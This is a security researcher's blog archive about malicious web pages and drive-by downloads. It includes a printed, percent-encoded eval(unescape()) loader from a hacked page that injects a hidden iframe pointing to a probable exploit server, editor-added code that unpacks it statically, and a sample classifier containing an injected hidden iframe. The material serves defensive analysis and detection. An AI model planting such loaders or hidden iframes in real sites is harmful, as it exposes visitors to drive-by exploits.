10 April 09 - 07:38 Microsoft publishes version 6 of the Security Intelligence Report
Microsoft has just published its latest Security Intelligence Report (version 6, covering the second half of 2008). I was involved as a contributing author of that report. It contains some information on malicious web pages and attacks on browsers that may be of interest:
- Live Search identified more than 1 million drive-by-download pages per month since early 2H08, or 0.07% of pages inspected.
- The geographical distribution shows an elevated number of malicious hosts in the .cn TLD.
- A minority of exploit servers are responsible for a majority of drive-by-download pages.
- Exploit servers can be responsible for 10,000+ drive-by-download pages.
- The top attack vector on browsers is the Adobe Flash vulnerability (CVE-2007-0071), accounting for over 10.3% of browser attacks. (A stark reminder that people should also patch their applications; I personally recommend Secunia's Personal Software Inspector, available at http://secunia.com/vulnerability_scanning/personal/.)
The report is available at http://www.microsoft.com/sir.
christianS - Security
09 January 09 - 14:09 Dormant Malicious Web Pages
Today I was analyzing a web page that we identified as part of a study on the New Zealand Internet. This web page was first identified as malicious in April 2008. It continued to exhibit malicious behavior until June 2008 and then did not exhibit malicious behavior for the rest of the year.
An investigation of the web page revealed nothing too exciting. It contained the following JavaScript snippet:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%30%39%31%63%32%66%37%61%63%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%31%38%38%29%2b%27%35%31%37%35%37%5c%27%20%77%69%64%74%68%3d%38%37%20%68%65%69%67%68%74%3d%33%32%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
which decodes to a hidden iframe (display: none) sourcing http://traffurl.ru/sliv?2539551757, which probably hosts the actual exploit. The leading digits of the query string are produced by Math.round(Math.random()*28188) on each load, with 51757 appended, so the exact URL varies from visit to visit.
As of today, the page appears unaltered compared to April 2008, but it is not exhibiting malicious behavior anymore. Digging into it further reveals a simple explanation: the server traffurl.ru is not accessible anymore (the hostname doesn't resolve).
I think there is an interesting take on this. The page appears clean, but really it has been hacked and abused. The webmaster obviously hasn't taken any action to clean up the page or to secure his site. As such, I think these pages are ticking time bombs: the original vulnerability that allowed the site to be hacked is still likely to exist, and as a result it's just a matter of time until the page gets "updated" with a working exploit server...
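The loader can be unpacked without running it. What follows is an added example (my code as editor, not from the post or from the compromised site): it extracts the unescape() argument, decodes the %XX escapes, reads back the hidden iframe the stage would document.write(), and reconstructs the URL for a given Math.random() draw. The src regular expression is written for this loader's concatenation pattern ('prefix' + Math.round(Math.random()*N) + 'suffix') and leaves those fields null for loaders that build the URL differently.

```javascript
'use strict';
// Added example (editor's code, not from the original post): unpack an
// eval(unescape("...")) loader statically and recover the iframe it would
// inject, without executing any of the attacker's JavaScript.

// The percent-encoded loader as it appeared on the compromised page in the
// post, split into segments (decoded text in the comments) for readability.
const SAMPLE = 'eval(unescape("' +
  '%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b' +                 // window.status='Done';
  '%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27' +                                 // document.write('
  '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%30%39%31%63%32%66%37%61%63%35%20' +        // <iframe name=091c2f7ac5
  '%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27' + // src=\'http://traffurl.ru/sliv?'
  '%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%31%38%38%29' + // +Math.round(Math.random()*28188)
  '%2b%27%35%31%37%35%37%5c%27%20' +                                                   // +'51757\'
  '%77%69%64%74%68%3d%38%37%20%68%65%69%67%68%74%3d%33%32%34%20' +                     // width=87 height=324
  '%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e' +         // style=\'display: none\'>
  '%3c%2f%69%66%72%61%6d%65%3e%27%29' +                                                // </iframe>')
  '"));';

// Pull the string literal out of eval(unescape("...")); null if the snippet
// is not of that shape, so a caller can try other unpackers.
function extractUnescapeArg(snippet) {
  const m = /eval\s*\(\s*unescape\s*\(\s*(["'])([^"']*)\1\s*\)\s*\)/.exec(snippet);
  return m ? m[2] : null;
}

// Explicit reimplementation of the legacy unescape(): %XX and %uXXXX decode,
// everything else passes through. Avoids the deprecated global and makes the
// decoding rule reviewable.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Read back the iframe the decoded stage would document.write(). The src is
// assembled as '<prefix>' + Math.round(Math.random()*<N>) + '<suffix>', so the
// pieces are taken from the source text rather than evaluated; the src fields
// are null when the concatenation does not follow that pattern.
function describeInjectedIframe(decoded) {
  const tag = /<iframe\b([^>]*)>/i.exec(decoded);
  if (!tag) return null;
  const attrs = tag[1];
  const src = /src=\\'([^']*)'\s*\+\s*Math\.round\(Math\.random\(\)\*(\d+)\)\s*\+\s*'([^'\\]*)\\'/.exec(attrs);
  let host = null;
  if (src) { try { host = new URL(src[1]).host; } catch (e) { host = null; } }
  const w = /\bwidth=(\d+)/i.exec(attrs);
  const h = /\bheight=(\d+)/i.exec(attrs);
  return {
    host,
    urlPrefix: src ? src[1] : null,
    randomUpperBound: src ? Number(src[2]) : null,
    urlSuffix: src ? src[3] : null,
    hidden: /display:\s*none/i.test(attrs),
    width: w ? Number(w[1]) : null,
    height: h ? Number(h[1]) : null,
  };
}

// Reconstruct the URL a visitor would have been sent to for a given draw of
// Math.random(); the URL observed in the post corresponds to a draw of 25395.
function exampleUrl(info, draw) {
  return info.urlPrefix + draw + info.urlSuffix;
}

function analyze(snippet) {
  const arg = extractUnescapeArg(snippet);
  if (arg === null) return { decoded: null, iframe: null };
  const decoded = legacyUnescape(arg);
  return { decoded, iframe: describeInjectedIframe(decoded) };
}

const result = analyze(SAMPLE);
console.log(result.decoded);
console.log(result.iframe, exampleUrl(result.iframe, 25395));
```

Nothing from the attacker's stage executes, which is the point: the host (here traffurl.ru) can be extracted, checked for resolution and blocklisted by a crawler without a browser ever touching the exploit server. A real unpacker would also need to handle nested eval layers and loaders that build the string with fromCharCode or string arithmetic, which this single-pattern version does not.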
christianS - PhD Research
16 December 08 - 11:55 The Impact of Incentives on Notice and Take-down
I've just read the paper from Tyler Moore and Richard Clayton on "The Impact of Incentives on Notice and Take-down." In this work, Moore and Clayton look at a variety of illegal web pages and analyze how long it takes for these web pages to be taken down as a result of a take-down request. They compare data from different types of web pages (phishing, child abuse, illegal pharmacy sites, etc.) and also look at the underlying technology used (shared hosting, fast-flux domains, etc.).
Phishing sites, for instance, are taken down very quickly compared to, for instance, illegal pharmacy sites. This is independent of the underlying technology. So a sophisticated phishing site that uses a fast-flux network is still taken down more quickly than an ordinary illegal pharmacy site that is hosted on a shared hosting provider. The authors conclude that the primary force that drives how quickly an illegal site is removed is the incentive behind removal and not so much the technology used by the attacker. So the quick removal of phishing sites can be explained by the commitment of the banks to removal: the risk of fraud, danger to the brand and loss of trust in online banking lead the bank to invest resources to make sure take-down happens. For the illegal pharmacy, who would be the driving force? The lack of one shows in the long up-times of these sites.
Taking this into the realm of malicious exploit servers, who would be the driving force? Who has the incentive to invest resources into take-down? If no one does, why not?
christianS - Security
13 December 08 - 16:20 What browser plugins are targeted as part of drive-bys?
I was always wondering what the best way is to configure my vulnerable system to catch the most malicious web sites with my client honeypot. The Microsoft Security Intelligence Report (January to June 2008, available at http://www.microsoft.com/sir) now includes information about which vulnerabilities are targeted. On page 33, the following vulnerabilities are listed:
- MS06-014—MDAC_RDS (12%)
- CVE-2007-5601—RealPlayer_IERPCtl (7%)
- CVE-2007-4816—BaoFengStorm_rawParse (7%)
- CVE-2007-0015—Apple_Quicktime_RTSP (6%)
- CVE-2007-4105—BaiduToolbar_DloadDS (5%)
- CVE-2008-1309—RealPlayer_rmoc3260_Console (5%)
- GLChat.ocx_ConnectAndEnterRoom (4%)
- MS06-071—MSXML_setRequestHeader (4%)
- CVE-2007-4748—PowerPlayer_Logo (4%)
- CVE-2006-5820—AOL_SuperBuddyAX (3%)
- Other (43%)
As you can already tell, some of the vulnerabilities are specifically targeted at the Chinese locale. According to the report, the most common locale for victims was indeed Chinese (47%), followed by U.S. English (23%).
For more details, and details about the methodology, I refer to the report itself.
christianS - PhD Research
08 December 08 - 09:20 ATNAC 2008: Identification of Malicious Web Pages With Static Heuristics
As part of my PhD research, we published a paper at the Australasian Telecommunication Networks and Applications Conference (ATNAC 2008). The paper is based on the work I did at the end of 2007 and looks at ways to identify malicious web pages that launch drive-by-download attacks by inspecting static heuristics on the page denoted by the URL.
Abstract:
Malicious web pages that launch client-side attacks on web browsers have become an increasing problem in recent years. High-interaction client honeypots are security devices that can detect these malicious web pages on a network. However, high-interaction client honeypots are both resource-intensive and known to miss attacks. This paper presents a novel classification method for detecting malicious web pages that involves inspecting the underlying static attributes of the initial HTTP response and HTML code. Because malicious web pages import exploits from remote resources and hide exploit code, static attributes characterizing these actions can be used to identify a majority of malicious web pages. Combining high-interaction client honeypots and this new classification method into a hybrid system leads to significant performance improvements.
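To make the "import from remote resources and hide exploit code" idea concrete, here is an added example (my code as editor, not the paper's classifier): a small static-attribute extractor over raw HTML with a linear score on top. The feature names, weights and threshold are illustrative assumptions rather than the ATNAC 2008 values, the page host and the two sample pages are constructed for the example, and the regular-expression tag matching stands in for the HTML parser a real system would use.

```javascript
'use strict';
// Added example (editor's code, not the paper's classifier): a minimal
// static-attribute feature extractor of the kind the abstract describes.
// Feature set, weights and threshold are illustrative assumptions, not the
// ATNAC 2008 values; host and pages below are constructed for the example.

const PAGE_HOST = 'kiwiwidgets.example';

const BENIGN = `<html><head><title>Kiwi Widgets</title>
<script src="/js/site.js"></script></head>
<body><p>Welcome.</p><img src="/logo.png"></body></html>`;

// Same page after the kind of injection discussed on this blog: an encoded
// loader plus a hidden iframe pulling content from a foreign host.
const COMPROMISED = `<html><head><title>Kiwi Widgets</title>
<script src="/js/site.js"></script>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65"))</script>
</head><body><p>Welcome.</p>
<iframe src="http://traffurl.ru/sliv?1" width=1 height=1 style="display: none"></iframe>
</body></html>`;

// Resolve relative or absolute src values to a host; null if unparsable.
function hostOf(url, pageHost) {
  try { return new URL(url, 'http://' + pageHost + '/').host; } catch (e) { return null; }
}

// Static attributes only: nothing is fetched and no script is executed.
function extractFeatures(html, pageHost) {
  const f = {
    externalScripts: 0,    // <script src> loaded from another host
    iframes: 0,
    hiddenIframes: 0,      // display:none, visibility:hidden or 0-2px sides
    crossHostIframes: 0,   // iframe src on another host
    evalCalls: (html.match(/\beval\s*\(/g) || []).length,
    decoders: (html.match(/\b(?:unescape|fromCharCode|decodeURIComponent)\s*\(/g) || []).length,
    longestEncodedRun: 0,  // longest unbroken run of %XX escapes, in bytes
  };
  for (const m of html.matchAll(/<script\b[^>]*\bsrc=["']?([^"'\s>]+)/gi)) {
    const h = hostOf(m[1], pageHost);
    if (h && h !== pageHost) f.externalScripts++;
  }
  for (const m of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    f.iframes++;
    const attrs = m[1];
    const w = /\bwidth=["']?(\d+)/i.exec(attrs);
    const h = /\bheight=["']?(\d+)/i.exec(attrs);
    const tiny = (w && Number(w[1]) <= 2) || (h && Number(h[1]) <= 2);
    if (tiny || /display:\s*none|visibility:\s*hidden/i.test(attrs)) f.hiddenIframes++;
    const src = /\bsrc=["']?([^"'\s>]+)/i.exec(attrs);
    const host = src ? hostOf(src[1], pageHost) : null;
    if (host && host !== pageHost) f.crossHostIframes++;
  }
  for (const m of html.matchAll(/(?:%[0-9a-fA-F]{2})+/g)) {
    f.longestEncodedRun = Math.max(f.longestEncodedRun, m[0].length / 3);
  }
  return f;
}

// Illustrative linear score. Hidden and cross-host iframes carry the most
// weight because they are the "import from remote, hide the code" actions the
// abstract singles out; a long run of %XX escapes is a hiding signal too.
const WEIGHTS = { externalScripts: 1, hiddenIframes: 3, crossHostIframes: 2, evalCalls: 2, decoders: 1 };
const ENCODED_RUN_BYTES = 32;
const THRESHOLD = 4;

function score(f) {
  let s = 0;
  for (const [name, w] of Object.entries(WEIGHTS)) s += w * f[name];
  if (f.longestEncodedRun >= ENCODED_RUN_BYTES) s += 2;
  return s;
}

// Returns the feature vector, score and verdict so a hybrid system can send
// only pages scoring at or above THRESHOLD to the high-interaction honeypot.
function classify(html, pageHost) {
  const features = extractFeatures(html, pageHost);
  const s = score(features);
  return { features, score: s, suspicious: s >= THRESHOLD };
}

console.log(classify(BENIGN, PAGE_HOST));
console.log(classify(COMPROMISED, PAGE_HOST));
```

The benign page scores 0 and the injected one scores 8, so only the latter would be handed to the honeypot. Two caveats a practitioner would want: the abstract also uses attributes of the initial HTTP response (headers, redirects), which this HTML-only extractor ignores, and cross-host iframes are common on legitimate pages (advertising, embedded video), so the weights have to be tuned against labelled data rather than set by hand as they are here.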
christianS - PhD Research
04 December 08 - 07:30 Live Search flags malicious web pages
As some of you might know, I am now working at Microsoft's search engine, Live Search. Not surprisingly, I am working on detection of malicious web pages. This week, that work had its visible release (see the Live Search blog posts: http://blogs.msdn.com/livesearch/archive/2008/12/02/battling-the-plague-of-the-web.aspx and http://blogs.msdn.com/livesearch/archive/2008/11/25/webmaster-tools-now-sniffing-for-malware.aspx).
Malicious web pages are now flagged on the results page. The result link that would normally take you to a web page now takes you to a warning. Showing a warning instead of removing the links from the results page is driven by the fact that many of the malicious pages are hacked pages with content relevant to the user's query, so users have the option to accept the risk and navigate to the site (secure practices significantly reduce the risk).
The warning also has an additional effect. It informs innocent webmasters of the fact that their site has been hacked and enables them to remove the malicious content from their site and take action so that the site will not be abused by attackers in the future (also see the paper Reinterpreting the Disclosure Debate for Web Infections). The approach taken by Webmaster Tools takes this even further, into the B2B world. It allows webmasters to monitor the sites their own site has a relationship with (established via outbound links). In case a web site has been detected to be malicious, a webmaster can either encourage that site to clean itself up or remove the outbound links to that site. This will further increase the safety of the World Wide Web.
christianS - Security
28 November 08 - 07:54 Oliver Day's post on Microsoft's Stance on Piracy and Patching
Last week, I stumbled upon an interesting guest blog post from Oliver Day, a staff security researcher at stopbadware.org, at SecurityFocus. He makes the case that Microsoft's policy of barring pirated copies of Windows from downloading patches is counter-productive when it comes to securing computer systems and making the Internet a safer place. The comments on the post are pretty antagonistic. I think the commenters are missing the point. If illegal copies are out there, and Microsoft takes action to discourage patching, vulnerabilities will continue to exist out there. With the existence of these vulnerabilities, attackers will invest resources to attack them. With these attacks out there, the Internet is a more dangerous place, for users of pirated Windows as well as legitimate users. If patching were easy and available to all without negative consequences, legitimate users would effectively be safer... and isn't that what we want?
christianS - Security
27 November 08 - 04:56 1st Pacific Rim Cyber Defense Competition Video Online
Back in April 2008, we had our 1st Pacific Rim Cyber Defense Competition. The event was organized by Barbara Endicott-Popovsky, her Center of Information Assurance & Cybersecurity, and an army of volunteers from different institutions (including Vic and myself). The event was held on the Microsoft campus. The video of the competition was just published on the UW TV web site and nicely conveys the excitement of everybody at the event. (It's located here: http://www.uwtv.org/programs/displayevent.aspx?rid=27982&fid=5856.) I am very proud to have been part of this event and am looking forward to competitions in the future.
christianS - Security